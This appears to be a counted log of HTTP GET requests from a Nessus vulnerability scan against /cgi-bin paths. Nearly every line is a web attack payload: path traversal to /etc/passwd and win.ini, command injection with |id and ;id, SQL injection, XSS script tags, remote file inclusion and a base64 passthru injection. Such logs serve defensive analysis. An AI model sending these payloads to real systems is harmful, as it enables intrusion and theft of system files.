1 GET /cgi-bin/newsscript.pl?mode=admin HTTP/1.1
1 GET /cgi-bin/nmap.php?target=|id HTTP/1.1
1 GET /cgi-bin/normal_html.cgi?file=|id| HTTP/1.1
1 GET /cgi-bin/notify?from=nessus\"|id\" HTTP/1.1
1 GET /cgi-bin/nph-exploitscanget.cgi?host=id&port=80&errchk=0&idsbypass=0 HTTP/1.1
1 GET /cgi-bin/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/nph-mr.cgi HTTP/1.1
1 GET /cgi-bin/nph-proxy.cgi HTTP/1.1
1 GET /cgi-bin/nph-test-cgi?* HTTP/1.0
2 GET /cgi-bin/nquser.php HTTP/1.1
1 GET /cgi-bin/nslookup.cgi?query=localhost%3bid&type=ANY&ns= HTTP/1.1
1 GET /cgi-bin/nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/nx/common/cds/menu.inc.php?c_path=http[:]//example[.]com/ HTTP/1.1
1 GET /cgi-bin/ohelp/en_US/Content/master/webadmin/WebAdmin.html HTTP/1.1
1 GET /cgi-bin/op/op.Login.php?login=guest&sesstheme=default&lang=English HTTP/1.1
1 GET /cgi-bin/open.php HTTP/1.1
1 GET /cgi-bin/openwebmail.pl HTTP/1.1
1 GET /cgi-bin/openwebmail/ HTTP/1.1
1 GET /cgi-bin/openwebmail/openwebmail.pl HTTP/1.1
1 GET /cgi-bin/ovlaunch.exe HTTP/1.1
1 GET /cgi-bin/p-news.php HTTP/1.1
1 GET /cgi-bin/pafiledb.php HTTP/1.1
1 GET /cgi-bin/page?view=about HTTP/1.1
1 GET /cgi-bin/pajax/pajax_call_dispatcher.php HTTP/1.1
1 GET /cgi-bin/pals-cgi?palsAction=restart&documentName=/etc/passwd HTTP/1.1
1 GET /cgi-bin/parse_xml.cgi?action=login&filename=frameset.html|id%00| HTTP/1.1
1 GET /cgi-bin/password_reminder.php HTTP/1.1
1 GET /cgi-bin/patch/index.php HTTP/1.1
1 GET /cgi-bin/pdesk.cgi?lang=../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/perl.exe?-v HTTP/1.1
1 GET /cgi-bin/perl?-v HTTP/1.1
1 GET /cgi-bin/pfdispaly.cgi?../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/pfdispaly?../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/phf?QALIAS=x%0a/bin/cat%20/etc/passwd HTTP/1.1
1 GET /cgi-bin/photo.php?albumid=-982'%20UNION%20SELECT%201,concat(0x73,0x69,0x74,0x65,0x78,0x5f,0x61,0x6c,0x62,0x75,0x6d,0x69,0x64,0x5f,0x73,0x71,0x6c,0x69,0x2e,0x6e,0x61,0x73,0x6c),3,4,5,6,7,8%20--%20' HTTP/1.1
1 GET /cgi-bin/php-ping.php?host=test&submit=Ping!&count=1|id|| HTTP/1.1
1 GET /cgi-bin/php.cgi?/etc/passwd HTTP/1.1
2 GET /cgi-bin/php/mytutos.php HTTP/1.1
1 GET /cgi-bin/phpinfo.php HTTP/1.1
1 GET /cgi-bin/phpnews/sendtofriend.php?mid='1' HTTP/1.1
1 GET /cgi-bin/phpping/index.php?pingto=www.nessus.org%20|%20dir HTTP/1.1
1 GET /cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1717627898&lang_crm=../../../../../../../../../../../..//etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1717627898&lang_crm=../../vtigerservice.php%00 HTTP/1.1
1 GET /cgi-bin/phptonuke.php?filnavn=/etc/passwd HTTP/1.1
1 GET /cgi-bin/plog-download.php?dl_type=album&checked[]=%27%20UNION%20SELECT%20%27plogger_checked_sql_injection.nasl%27%2c0%2c0%2c0%2c0%2c0%2c0%2c0%2c0%2c0%2c0%2c0%2c0%2c0%2c0%20--%20 HTTP/1.1
1 GET /cgi-bin/plog-rss.php?level=collection&id=999%20OR%20plogger_id_sql_injection.nasl HTTP/1.1
1 GET /cgi-bin/plugins/image2/plugin.js HTTP/1.1
1 GET /cgi-bin/plugins/preview/preview.html HTTP/1.1
1 GET /cgi-bin/plugins/safehtml/HTMLSax3.php?dir[plugins]=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/plugins/safehtml/safehtml.php?dir[plugins]=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/pm/add_ons/mail_this_entry/mail_authocheck.php?pm_path=http[:]//example[.]com/&sfx=.txt HTTP/1.1
1 GET /cgi-bin/pmwiki.php?GLOBALS[FarmD]=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/pmwiki.php HTTP/1.1
1 GET /cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/popup.php?include_path=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/port.php?proto=tcp' HTTP/1.1
1 GET /cgi-bin/portal/ HTTP/1.1
1 GET /cgi-bin/portal/diag/index.jsp HTTP/1.1
1 GET /cgi-bin/preferences.php?action=setcookie HTTP/1.1
1 GET /cgi-bin/print.php?what=article&id=' HTTP/1.1
7 GET /cgi-bin/printenv.cgi HTTP/1.1
8 GET /cgi-bin/printenv HTTP/1.1
1 GET /cgi-bin/printfaq.php?lng=en&pg=1 HTTP/1.1
1 GET /cgi-bin/processSimple.do HTTP/1.1
1 GET /cgi-bin/profil.php?id=1%20<script>foo</script> HTTP/1.1
1 GET /cgi-bin/projects_site/uploadfile.php?demoSession=1 HTTP/1.1
1 GET /cgi-bin/protection.php?action=logout&siteurl=/etc/passwd HTTP/1.1
1 GET /cgi-bin/proxy.php?url=%3cscript%3ealert%28%27clarkconnect_url_xss.nasl%27%29%3c%2fscript%3e HTTP/1.1
1 GET /cgi-bin/psunami.cgi?file=|id| HTTP/1.1
1 GET /cgi-bin/pub/pki?cmd=serverInfo HTTP/1.1
1 GET /cgi-bin/public/index.php?s=admin/%5cthink%5capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.php HTTP/1.1
1 GET /cgi-bin/public/index.php?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.php HTTP/1.1
1 GET /cgi-bin/public/index.php?s=index/%5cthink%5cRequest/input&filter=file_get_contents&data=index.php HTTP/1.1
1 GET /cgi-bin/pwcgi/smpwservicescgi.exe?TARGET=http[:]//www[.]example[.]com HTTP/1.1
1 GET /cgi-bin/query.cgi HTTP/1.1
1 GET /cgi-bin/query?group=-- HTTP/1.1
1 GET /cgi-bin/query?mss=%2e%2e/config HTTP/1.1
1 GET /cgi-bin/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd%00html HTTP/1.1
1 GET /cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id= HTTP/1.1
7 GET /cgi-bin/quickstore.cgi HTTP/1.1
1 GET /cgi-bin/r57.php HTTP/1.1
1 GET /cgi-bin/r57shell.php HTTP/1.1
1 GET /cgi-bin/ray/modules/global/inc/content.inc.php?sIncPath=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/readfile.tcl?file=/etc/master.passwd HTTP/1.1
1 GET /cgi-bin/recordings/index.php HTTP/1.1
1 GET /cgi-bin/remindpasswd HTTP/1.1
1 GET /cgi-bin/remotehtmlview.php?phpAds_path=http[:]//example[.]com HTTP/1.1
1 GET /cgi-bin/reports/rwservlet HTTP/1.1
1 GET /cgi-bin/resetpw.php?email=../../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/rest/api/2.0.alpha1/serverInfo HTTP/1.1
1 GET /cgi-bin/rest/api/2/serverInfo HTTP/1.1
1 GET /cgi-bin/review.php?id=1&cat=&subcat=%22%3E%3cscript%3ealert%28%27phpmydirectory_multiple_xss.nasl%27%29%3b%3c%2fscript%3e HTTP/1.1
1 GET /cgi-bin/rol.php HTTP/1.1
1 GET /cgi-bin/roschedule.php HTTP/1.1
1 GET /cgi-bin/rot13sj.cgi?/etc/passwd HTTP/1.1
1 GET /cgi-bin/rpc.php?cmd=display_get_requesters&id=1 HTTP/1.1
1 GET /cgi-bin/rss.php?blogId=1&profile=../../config/config.properties.php%00 HTTP/1.1
2 GET /cgi-bin/s_form.cgi HTTP/1.1
1 GET /cgi-bin/samba/smb2www.pl HTTP/1.1
1 GET /cgi-bin/samples/sample_posteddata.php HTTP/1.1
1 GET /cgi-bin/save.php?file_save=/etc/passwd HTTP/1.1
1 GET /cgi-bin/scp.dll/sendto?template=../../../../../../../../../../../../boot.ini%00gwextranet_template_dir_traversal.nasl HTTP/1.1
1 GET /cgi-bin/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=%3C/option%3E%3C/SELECT%3E%3C?phpinfo();?%3E HTTP/1.1
1 GET /cgi-bin/sdbsearch.cgi?stichwort=anything HTTP/1.1
1 GET /cgi-bin/search.aspx HTTP/1.1
1 GET /cgi-bin/search.cfm HTTP/1.1
1 GET /cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1
1 GET /cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\winnt\\win.ini HTTP/1.1
9 GET /cgi-bin/search.cgi HTTP/1.1
1 GET /cgi-bin/search.exe HTTP/1.1
1 GET /cgi-bin/search.jsp?q=%25%22%3cscript%3ealert(1717627921)%3c/script%3e HTTP/1.1
1 GET /cgi-bin/search.php?Submit=true&search='); HTTP/1.1
1 GET /cgi-bin/search.php?allwords=<br><script>foo</script>&cid=0&title=1&desc=1 HTTP/1.1
3 GET /cgi-bin/search.php HTTP/1.1
1 GET /cgi-bin/search.pl?form=../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/search.pl HTTP/1.1
1 GET /cgi-bin/search/results.stm?indexname=>\"><script>foo</script>&style=fancy&spage=60&query=Folder%20name HTTP/1.1
1 GET /cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc HTTP/1.1
7 GET /cgi-bin/search/search.cgi HTTP/1.1
1 GET /cgi-bin/search/show.pl?url=file:/etc/passwd HTTP/1.1
1 GET /cgi-bin/search/show.pl?url=http[:]//www[.]google[.]com HTTP/1.1
1 GET /cgi-bin/search=%3Cscript%3Ealert('XSS')%3C/script%3E HTTP/1.1
8 GET /cgi-bin/search HTTP/1.1
1 GET /cgi-bin/secure.php?cfgProgDir=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/sendcard.php?view=1&id=%27sendcard_sql.nasl HTTP/1.1
1 GET /cgi-bin/sendtemp.pl?templ=../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/server.pt?in_ra_groupoperator_1=and&in_hi_userid=1&in_hi_req_objtype=1&space=SearchResult&in_tx_fulltext=*&in_hi_groupoperator_1=and&parentid=1&in_hi_req_apps=1&cached=false&control=advancedstart&in_hi_revealed_1=0&in_hi_req_page=10&in_hi_depth_1=0&in_hi_totalgroups=1&parentname=AdvancedSearch&in_ra_topoperator=and HTTP/1.1
1 GET /cgi-bin/server.pt?open=space&name=%22%3b%7d%3c%2fscript%3e%3cscript%3ealert%28%27plumtree_name_xss.nasl%27%29%3c%2fscript%3e HTTP/1.1
1 GET /cgi-bin/server/s3_download.php HTTP/1.1
2 GET /cgi-bin/services/Walrus HTTP/1.1
1 GET /cgi-bin/services/help/?module=horde&show=about HTTP/1.1
1 GET /cgi-bin/services/help/?module=horde&show=menu HTTP/1.1
1 GET /cgi-bin/session/login.php?dest=nessus%22%3e%3cscript%3ealert%28%27ossim_dest_xss.nasl%27%29%3c%2fscript%3e%3c%21--%20 HTTP/1.1
1 GET /cgi-bin/setcookie.php?u=../../../../../../../../../../../../etc/passwd%00&plugin=pblang_mult_flaws.nasl HTTP/1.1
1 GET /cgi-bin/settings/site.ini HTTP/1.1
1 GET /cgi-bin/setup.php HTTP/1.1
1 GET /cgi-bin/sgdynamo.exe?HTNAME=<script>foo</script> HTTP/1.1
1 GET /cgi-bin/sgdynamo.exe?HTNAME=sgdynamo.exe HTTP/1.1
1 GET /cgi-bin/shared/help.php?page=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/shell/sitecore.version.xml HTTP/1.1
1 GET /cgi-bin/shop.plx/page=nessus2030034577 HTTP/1.1
1 GET /cgi-bin/shop.plx HTTP/1.1
1 GET /cgi-bin/shopaddtocart.asp?productid='42 HTTP/1.1
1 GET /cgi-bin/shopexd.asp?catalogid='42 HTTP/1.1
1 GET /cgi-bin/shopper.cgi?newpage=../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/shoutbox.php?conf=../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/shoutbox.php?conf=../ HTTP/1.1
1 GET /cgi-bin/showcat.php?cat=1' HTTP/1.1
1 GET /cgi-bin/showproduct.php?product=1' HTTP/1.1
1 GET /cgi-bin/simple/view_page?mv_arg=|cat%20/etc/passwd| HTTP/1.1
1 GET /cgi-bin/siteframe.php?LOCAL_PATH=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/siteframe.php?LOCAL_PATH=macros/100-siteframe.macro%00 HTTP/1.1
1 GET /cgi-bin/sitemap.xml HTTP/1.1
1 GET /cgi-bin/smb2www.pl HTTP/1.1
1 GET /cgi-bin/smpwservicescgi.exe HTTP/1.1
1 GET /cgi-bin/snoop/ HTTP/1.1
1 GET /cgi-bin/snoopservlet/ HTTP/1.1
1 GET /cgi-bin/snpfiltered.pl?t=c&u=<script>foo</script> HTTP/1.1
1 GET /cgi-bin/sojourn.cgi?cat=../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/source?v=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/sources/functions.php?root_path=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/spaw/dialogs/confirm.php?spaw_root=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/sql.php3?LIB_INC=1&btnDrop=No&goto=/etc/passwd HTTP/1.1
1 GET /cgi-bin/sql.php?LIB_INC=1&btnDrop=No&goto=/etc/passwd HTTP/1.1
1 GET /cgi-bin/sql/install-0.9.7.php?p=2 HTTP/1.1
1 GET /cgi-bin/squirrelcart/cart_content.php?cart_isp_root=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/sqwebmail?redirect=%0d%0a%0d%0asqwebmail_http_splitting.nasl HTTP/1.1
1 GET /cgi-bin/src/login.php HTTP/1.1
1 GET /cgi-bin/src/redirect.php HTTP/1.1
1 GET /cgi-bin/starnet/addons/slideshow_full.php?album_name=%271295360743 HTTP/1.1
1 GET /cgi-bin/starnet/modules/include/include.php?cmsdir=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/starnet/modules/sn_allbum/slideshow.php?cmsdir=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/starnet/themes/editable/main.inc.php?cmsdir=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/start.action HTTP/1.1
1 GET /cgi-bin/static/./WEB-INF/web.xml HTTP/1.1
7 GET /cgi-bin/status.cgi HTTP/1.1
1 GET /cgi-bin/status.php3 HTTP/1.1
7 GET /cgi-bin/status HTTP/1.1
1 GET /cgi-bin/store.cgi?StartID=../../../../../../../../../etc/passwd%00.html HTTP/1.1
1 GET /cgi-bin/store.php?crn=42'&action=show&show_products_mode=cat_click HTTP/1.1
1 GET /cgi-bin/story.pl?next=../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/struts/webconsole.html HTTP/1.1
1 GET /cgi-bin/styles.php?toroot=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/subsystems/permissions.info.php HTTP/1.1
1 GET /cgi-bin/sugarcrm/modules/Users/Login.php?theme=../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/superguestconfig HTTP/1.1
1 GET /cgi-bin/support.php?mod_id=2&kb_ask=%3c%2ftextarea%3e%3cscript%3ealert%28%22cerberus_support_center_mult_flaws.nasl%22%29%3c%2fscript%3e HTTP/1.1
1 GET /cgi-bin/support/ttx.cgi HTTP/1.1
1 GET /cgi-bin/supporter/tupdate.php?groupid=change&sg=' HTTP/1.1
1 GET /cgi-bin/surgeweb?username_ex=\"><scri<script>alert(42);</script><input type=\"hidden
1 GET /cgi-bin/survey.inc.php?path=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/swc?ctr=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.1
1 GET /cgi-bin/swr.jsp?q=%25\"<script>alert(1717627921)</script>&swrnum=1 HTTP/1.1
1 GET /cgi-bin/sysinfo.cgi?action=systemdoc&name=sysinfo_name_cmd_exec.nasl;id HTTP/1.1
1 GET /cgi-bin/sysinfo/ HTTP/1.1
1 GET /cgi-bin/sysinfo/sysinfo.cgi?action=systemdoc&name=sysinfo_name_cmd_exec.nasl;id HTTP/1.1
1 GET /cgi-bin/test-cgi?* HTTP/1.0
7 GET /cgi-bin/test-cgi HTTP/1.1
7 GET /cgi-bin/test.cgi HTTP/1.1
1 GET /cgi-bin/test.php HTTP/1.1
7 GET /cgi-bin/test.sh HTTP/1.1
1 GET /cgi-bin/tests/test_tools/selenium/core/SeleniumLog.html HTTP/1.1
1 GET /cgi-bin/texis.cgi/KH9xMhOU-texis_path_disclosure HTTP/1.1
1 GET /cgi-bin/texis.exe/?-dump HTTP/1.1
1 GET /cgi-bin/texis.exe/KH9xMhOU-texis_path_disclosure HTTP/1.1
1 GET /cgi-bin/texis/KH9xMhOU-texis_path_disclosure HTTP/1.1
1 GET /cgi-bin/themes/program/themesettings.inc.php?themesdir=/etc/passwd%00 HTTP/1.1
4 GET /cgi-bin/tiki-index.php HTTP/1.1
1 GET /cgi-bin/tinfo.php?id=1717627944 HTTP/1.1
1 GET /cgi-bin/tinybrowser/upload.php?badfiles=1><script>alert('tinybrowser_multiple_xss')</script> HTTP/1.1
1 GET /cgi-bin/tinybrowser/upload.php?dupfiles=1><script>alert('tinybrowser_multiple_xss')</script> HTTP/1.1
1 GET /cgi-bin/tinybrowser/upload.php?goodfiles=1><script>alert('tinybrowser_multiple_xss')</script> HTTP/1.1
1 GET /cgi-bin/tombstone.cfm?ProfileID=<script>foo</script> HTTP/1.1
1 GET /cgi-bin/tomcat_proxy_directory_traversal.nasl1717627927 HTTP/1.1
1 GET /cgi-bin/top.php?header=../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/topic.php?tid='select HTTP/1.1
1 GET /cgi-bin/tree.php HTTP/1.1
1 GET /cgi-bin/tst.bat|type%20c:\\windows\\win.ini HTTP/1.1
1 GET /cgi-bin/tst.bat|type%20c:\\winnt\\win.ini HTTP/1.1
1 GET /cgi-bin/tsweb.asp HTTP/1.1
1 GET /cgi-bin/tsweb/ HTTP/1.1
1 GET /cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/ttx.cgi HTTP/1.1
1 GET /cgi-bin/ttx/ttx.cgi HTTP/1.1
2 GET /cgi-bin/twiki/ HTTP/1.1
1 GET /cgi-bin/twiki/view/TWiki/WebHome HTTP/1.1
1 GET /cgi-bin/typo3/index.php HTTP/1.1
1 GET /cgi-bin/ubbthreads.php HTTP/1.1
1 GET /cgi-bin/update.php?op=info HTTP/1.1
1 GET /cgi-bin/update.php HTTP/1.1
1 GET /cgi-bin/upgrade/index.php HTTP/1.1
1 GET /cgi-bin/upgradev1.php HTTP/1.1
8 GET /cgi-bin/upload.cgi HTTP/1.1
1 GET /cgi-bin/upload/upload-submit.do HTTP/1.1
7 GET /cgi-bin/urlcount.cgi HTTP/1.1
1 GET /cgi-bin/user.cgi?url=\">%3Cscript%3Ealert(\"gossamer_links_url_xss.nasl\")%3B%3C%2Fscript%3E&from=add HTTP/1.1
2 GET /cgi-bin/user.php HTTP/1.1
1 GET /cgi-bin/users/users.php HTTP/1.1
1 GET /cgi-bin/usrdetails.php?sgnuptype=csaleID<script>nessus</script> HTTP/1.1
1 GET /cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/vhost.php?action=logout&time=1717627690 HTTP/1.1
1 GET /cgi-bin/viart_shop.xml HTTP/1.1
1 GET /cgi-bin/view.php?PG=foobar HTTP/1.1
1 GET /cgi-bin/view/System/WebHome?rev=1 HTTP/1.1
1 GET /cgi-bin/view/TWiki/WebHome HTTP/1.1
1 GET /cgi-bin/view_user.php?list=1&letter=&sort_by='select HTTP/1.1
1 GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1
1 GET /cgi-bin/viewcvs.cgi/ HTTP/1.1
7 GET /cgi-bin/viewcvs.cgi HTTP/1.1
1 GET /cgi-bin/viewpage.php?file=/etc/passwd HTTP/1.1
2 GET /cgi-bin/viewvc.cgi/ HTTP/1.1
2 GET /cgi-bin/wa.cgi?DEBUG-SHOW-VERSION HTTP/1.1
7 GET /cgi-bin/wa.cgi HTTP/1.1
2 GET /cgi-bin/wa.exe?DEBUG-SHOW-VERSION HTTP/1.1
7 GET /cgi-bin/wa.exe HTTP/1.1
2 GET /cgi-bin/wa?DEBUG-SHOW-VERSION HTTP/1.1
7 GET /cgi-bin/wa HTTP/1.1
1 GET /cgi-bin/way-board/way-board.cgi?db=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/wc.dll?wwMaint~EditConfig HTTP/1.1
1 GET /cgi-bin/webadmin.php?show=%2Fetc%2Fpasswd HTTP/1.1
1 GET /cgi-bin/webapp/home.html?0 HTTP/1.1
1 GET /cgi-bin/webapp HTTP/1.1
1 GET /cgi-bin/webappmon.exe?ins=nowait&act=natping&sel=%22255.255.255.255%20%26%20id%26%22 HTTP/1.1
1 GET /cgi-bin/webboard/generate.cgi HTTP/1.1
1 GET /cgi-bin/webc.cgi/ HTTP/1.1
1 GET /cgi-bin/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;id|&CODE=PHOLD HTTP/1.1
1 GET /cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;id|&CODE=PHOLD HTTP/1.1
1 GET /cgi-bin/webdist.cgi?distloc=;id HTTP/1.1
1 GET /cgi-bin/webglimpse.cgi HTTP/1.1
1 GET /cgi-bin/webglimpse/webglimpse.cgi HTTP/1.1
1 GET /cgi-bin/webplus.exe?script=webplus_install_path.nasl HTTP/1.1
1 GET /cgi-bin/webplus?script=/../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/webwho.pl HTTP/1.1
1 GET /cgi-bin/welcome.php?custom_welcome_page=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/welcome HTTP/1.1
1 GET /cgi-bin/whois.cgi?action=load&whois=%3Bid HTTP/1.1
7 GET /cgi-bin/whois.cgi HTTP/1.1
1 GET /cgi-bin/whois.php?query=|id HTTP/1.1
2 GET /cgi-bin/whois_raw.cgi?fqdn=%0Aid HTTP/1.1
1 GET /cgi-bin/wihphoto/start.php HTTP/1.1
1 GET /cgi-bin/wiki.php/<script>foo</script> HTTP/1.1
1 GET /cgi-bin/wiki/edit.php?page=SandBox&suck_url=../kernel/config_inc.php&do_suck=h HTTP/1.1
1 GET /cgi-bin/wiki/rankings.php HTTP/1.1
1 GET /cgi-bin/wikka.php?wakka=HomePage/../../actions/wikkachanges HTTP/1.1
1 GET /cgi-bin/wizard/index.php HTTP/1.1
1 GET /cgi-bin/wordtrans.php?command=show_desc&advanced=1%22%3bid%3b%20true%20%22 HTTP/1.1
1 GET /cgi-bin/wps/wps_shop.cgi?action=showartikel&cat=nessus&catname=nessus&art=|id| HTTP/1.1
1 GET /cgi-bin/wps_shop.cgi?action=showartikel&cat=nessus&catname=nessus&art=|id| HTTP/1.1
1 GET /cgi-bin/wsasp.dll/WService=wsbroker1/webtools/oscommand.w HTTP/1.1
1 GET /cgi-bin/wsasp.dll/WService=wsbroker1/webutil/ping.p HTTP/1.1
1 GET /cgi-bin/wsisa.dll/WService=wsbroker1/webtools/oscommand.w HTTP/1.1
1 GET /cgi-bin/wsisa.dll/WService=wsbroker1/webutil/ping.p HTTP/1.1
1 GET /cgi-bin/wsnsa.dll/WService=wsbroker1/webtools/oscommand.w HTTP/1.1
1 GET /cgi-bin/wsnsa.dll/WService=wsbroker1/webutil/ping.p HTTP/1.1
1 GET /cgi-bin/wspd_cgi.sh/WService=wsbroker1/webtools/oscommand.w HTTP/1.1
1 GET /cgi-bin/wspd_cgi.sh/WService=wsbroker1/webutil/ping.p HTTP/1.1
1 GET /cgi-bin/www.83.118.68.34.bc.googleusercontent.com.7z HTTP/1.1
1 GET /cgi-bin/www.83.118.68.34.bc.googleusercontent.com.Z HTTP/1.1
1 GET /cgi-bin/www.83.118.68.34.bc.googleusercontent.com.bz2 HTTP/1.1
1 GET /cgi-bin/www.83.118.68.34.bc.googleusercontent.com.gz HTTP/1.1
1 GET /cgi-bin/www.83.118.68.34.bc.googleusercontent.com.jar HTTP/1.1
1 GET /cgi-bin/www.83.118.68.34.bc.googleusercontent.com.rar HTTP/1.1
1 GET /cgi-bin/www.83.118.68.34.bc.googleusercontent.com.tar.bz2 HTTP/1.1
1 GET /cgi-bin/www.83.118.68.34.bc.googleusercontent.com.tar.gz HTTP/1.1
1 GET /cgi-bin/www.83.118.68.34.bc.googleusercontent.com.tar HTTP/1.1
1 GET /cgi-bin/www.83.118.68.34.bc.googleusercontent.com.tgz HTTP/1.1
1 GET /cgi-bin/www.83.118.68.34.bc.googleusercontent.com.war HTTP/1.1
1 GET /cgi-bin/www.83.118.68.34.bc.googleusercontent.com.z HTTP/1.1
1 GET /cgi-bin/www.83.118.68.34.bc.googleusercontent.com.zip HTTP/1.1
1 GET /cgi-bin/www.83.118.68.34.googleusercontent.7z HTTP/1.1
1 GET /cgi-bin/www.83.118.68.34.googleusercontent.Z HTTP/1.1
1 GET /cgi-bin/www.83.118.68.34.googleusercontent.bz2 HTTP/1.1
1 GET /cgi-bin/www.83.118.68.34.googleusercontent.gz HTTP/1.1
1 GET /cgi-bin/www.83.118.68.34.googleusercontent.jar HTTP/1.1
1 GET /cgi-bin/www.83.118.68.34.googleusercontent.rar HTTP/1.1
1 GET /cgi-bin/www.83.118.68.34.googleusercontent.tar.bz2 HTTP/1.1
1 GET /cgi-bin/www.83.118.68.34.googleusercontent.tar.gz HTTP/1.1
1 GET /cgi-bin/www.83.118.68.34.googleusercontent.tar HTTP/1.1
1 GET /cgi-bin/www.83.118.68.34.googleusercontent.tgz HTTP/1.1
1 GET /cgi-bin/www.83.118.68.34.googleusercontent.war HTTP/1.1
1 GET /cgi-bin/www.83.118.68.34.googleusercontent.z HTTP/1.1
1 GET /cgi-bin/www.83.118.68.34.googleusercontent.zip HTTP/1.1
1 GET /cgi-bin/www/delivery/ac.php?bannerid=-1717627913+OR+1=1+--+';passthru(base64_decode($_SERVER[HTTP_NESSUS_MW7GB4TL]));die;/* HTTP/1.1
1 GET /cgi-bin/www/delivery/ac.php?bannerid=-598+OR+1=1 HTTP/1.1
1 GET /cgi-bin/www/delivery/fc.php?MAX_type=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/wwwboard.html HTTP/1.1
1 GET /cgi-bin/x_news.php HTTP/1.1
1 GET /cgi-bin/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl HTTP/1.1
1 GET /cgi-bin/xaradodb/tests/tmssql.php?do=phpinfo HTTP/1.1
1 GET /cgi-bin/zenworks/jsp/fw/internal/Login.jsp HTTP/1.1
1 GET /cgi-bin/zml.cgi?file=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/zpanel.php?page=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin2/ HTTP/1.1
5 GET /cgi-bin HTTP/1.1
1 GET /cgi-binadmin/index.php HTTP/1.1
1 GET /cgi-binfaq.php?skin=../../admin/manager&tplpath=admin HTTP/1.1
1 GET /cgi-binmultihtml.pl?multi=/etc/passwd%00html HTTP/1.1
1 GET /cgi-binsearch-results.dot?search_query=nessus%22%3e%3cscript%3ealert%28%27dotcms_search_query_xss.nasl%27%29%3c%2fscript%3e%2f HTTP/1.1
1 GET /cgi-binsearch_results.dot?search_query=nessus%22%3e%3cscript%3ealert%28%27dotcms_search_query_xss.nasl%27%29%3c%2fscript%3e%2f HTTP/1.1
1 GET /cgi-csc/ HTTP/1.1
1 GET /cgi-isapi/ HTTP/1.1
1 GET /cgi-lib/ HTTP/1.1
